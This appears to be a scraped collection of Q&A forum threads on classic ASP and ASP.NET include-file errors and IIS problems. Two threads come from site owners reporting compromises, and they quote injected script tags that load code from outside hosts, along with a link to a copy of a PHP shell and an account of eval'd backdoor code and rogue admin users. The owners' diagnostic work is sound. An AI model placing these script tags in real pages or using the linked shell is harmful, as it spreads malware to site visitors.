I have a hybrid ASP.NET/ASP Native application that in one asp page uses a include to a .htm page that has hidden fields. I went to edit that page and now when I run the application it throws an execption: Include File Not Found.
I reverted to the last saved version in TFS and the error still remains. Online I have seen some things about absolute path but this is in the same directory as the page thats missing the error and it was working fine.
I tried to check the attributes in Dos and its not READ ONLY.
Has anyone experienced this before and any ideas on how to solve it?
Resolved issue:
I did not realize that ASP will parse comments as real code for certain things. In this case the <!--include --> was inside of a comment in a file that would not have had access to that path.
For example:
ASP Page that really calls the include:
c:\myproject\pages\mypage.asp
Include location:
c:\myproject\pages\includes\includeme.htm
ASP Page that had the notes:
c:\myproject\pages\includes\otherfile.asp
The location "includes\includeme.htm" was not accessible from otherfile.asp but it was commented out so I assumed it would never try to go their.
/*
Some notes.... <!-- #include file="includes\includeme.htm" -->
*/
So I removed the comment and it worked perfectly again.
This comment was worth adding to the answer based on how well it explains why what I did worked. Thank You #anonjr
#include is a server directive that is processed before anything else is parsed
- so the server will attempt to retrieve any files you have #include'd and...
include them.
Related
Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
Some random lines in the function.php that were handling posts /
gets. We removed those but that didn't seem to solve the issue.
We found a wordpress user that no one has apparently created. So we removed that.
Reset all passwords on wordpress and FTP access
When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post so only the cached remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Try to narrow down the injection source.
Disable plugins one at a time
Switch to a different theme
Check .htaccess files
Test against server generated injections
Test against browser generated injections
had the same issue few hours ago.
Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD.
Cleared the line and deleted the file, now all ok.
But how the hell somebody could control index.pho I don't know....
First things first, yes I am fully aware this has been addressed here before, however none of the solutions seem to resolve my issue. My problem is simply that I have created a new web project and everything works fine with the default code template that VS2013 has provided, the problem I am currently runing into is adding my own CSS files. This is the process I went through to add them:
added CSS folder under the already existing Content directory
Linked to CSS files in the header CSHTML (I can be sure it is linked properly as it is not a 404 error
but when i run the project i get: Status Code:401 Unauthorized (pulled form the network explorer in chrome dev tools), nothing more. I have tried everything from modifying my config file to setting WindowsAuthentication to true and even moving NTLM to the top, to going into IIS and giving everyone access to every possible function to the CSS directory, been at this for an hour and I'm simply lost, any ideas?
Edit: if it helps at all this is the erro i get when i navigate to one of the CSS files:
I found the issue and I feel incredibly stupid about it, as it turns out all of my css files had encryption set on, i simply had to turn it off: right-click
*.css file > Properties (General tab) > Advanced button > Encrypt contents to secure data checkbox.
Works like a dream. If anyone ever purchases a template form ThemeForest, be wary of that.
Maybe this is a bonehead question, but I cannot figure out why this is happening.
I have to make an update to an old, classic ASP web site. One of the requests was to modify the footer so that the comments and suggestions could have the emails associated with a link changed in the administration panel.
That's not the problem, the original footer used on all pages was added as...
</div>
<!--#include file="../include/footer.htm"-->
</body>
If I add enter code here
enter code here<%#LANGUAGE="VBSCRIPT" %>
to the top of the page and change the extension to either .inc or .asp, modify the original page to:
</div>
<!--#include file="../include/footer.inc"--> (or .asp)
</body>
...I get an Error 500. I've tried using the web console in the browser, but no additional info there and there is no code on the page, only the declaration that VBScript will be used. Any help would be greatly appreciated. I'm sure this is something stupid that I knew 15 years ago, but just can't remember since I haven't touched ASP since 2002.
Parent paths are disabled by default in iis 7. This means that you'll get an error if you use "../" in an include file path
http://www.iis.net/learn/application-frameworks/running-classic-asp-applications-on-iis-7-and-iis-8/classic-asp-parent-paths-are-disabled-by-default
You could enable them in iis manager or you could use include virtual
<!--#include virtual="/root/include/footer.htm"-->
You could also use iis manager to edit how the server handles error pages, so that you can get helpful debug text rather than just a 500 internal server error page
first check IIS configuration
ERROR 500 causes by web server, google can found about this
If you set it as an .asp or .inc page then I recommend you set the content of the page up like this:
<%
'code here
%>
When you include B.asp into A.asp: also check that: B.asp not contains global variables / functions that are already declared in A.asp
I have an ASP.NET master page which references a #include file as follows:
<!--#include virtual="/includes/scripts.inc"-->
I have modified the file /includes/scripts.inc but the changes do not show up in pages.
What needs to be done so modifications will be reflected?
I need to avoid the following:
restarting the server
restarting IIS
modifying web.config (doesn't appear to have any effect)
pretty much anything that causes the app domain to restart
Any other options? Is there a setting which affects how long IIS caches #include files?
First, as you probably know, you shouldn't use the #include directive with ASP.NET. The right solution is to use a user control or server control. However, if what you want is to inject a bunch of HTML and Javascript into a page (i.e. no server-side code), then you could use Response.WriteFile:
<%# Page Language="vb"%>
<html>
<body>
<% Response.WriteFile( "scripts.inc" ) %>
</body>
</html>
So as long as it's really static include, just load the file in C# code and inject it yourself. then put it in the cache with file dependency and the object will turn null after you change the file which will provide you the flag to read it again.
If it's not really static include (static == no ASP.NET controls - it can be very changeable otherwise - like a spew from a DB or different CSS for very user ) then you want to mess with page compilation and that's not going to happen unless you go and write your own template processor or something :-)
Doens't have anything to do with caching, either server-side or client-side. It's a compilation issue. #include isn't caught as a modification in ASP.NET when changed, so the page isn't rebuilt.
This KB should help: http://support.microsoft.com/kb/306575
If you're caching files that might need to change, you should include a version number in the file name.
eg: <!--#include virtual="/includes/scripts-1.0.inc"-->
then when you need to make changes to it, update your include to:
<!--#include virtual="/includes/scripts-2.0.inc"-->
I developed a application using asp.net and uploaded the site in online it is working fine.
After few days i am getting parser error.
"<script src=http://fhdmtr.org/vb7/html.php ></script>" this script is generating in every page in the bottom of the page in source code in the site. it is automatically generating.
when i remove it is work fine after few days it is again generating.
The error is occurring because the Doctorenq.aspx script is using a Master Page. Pages configured with a MasterPageFile attribute can only contain a very narrow set of tags, usually just <asp:Content>, corresponding to content placeholders in the master. If you are adding the reference to the PHP script yourself (though I don't understand how that's supposed to work), you should either include it in the Master Page or include it inside one of your existing <asp:Content> tags.
If you aren't adding the reference to the tag, your problem may be with security instead of programming, and as such would be OT for SO.
The fail suggests that the site can't handle the markup.
If it was working and now doesn't, check the version of .NET websit is running. Something may have changed it to use an earlier verions of .NET, which can't parse the page.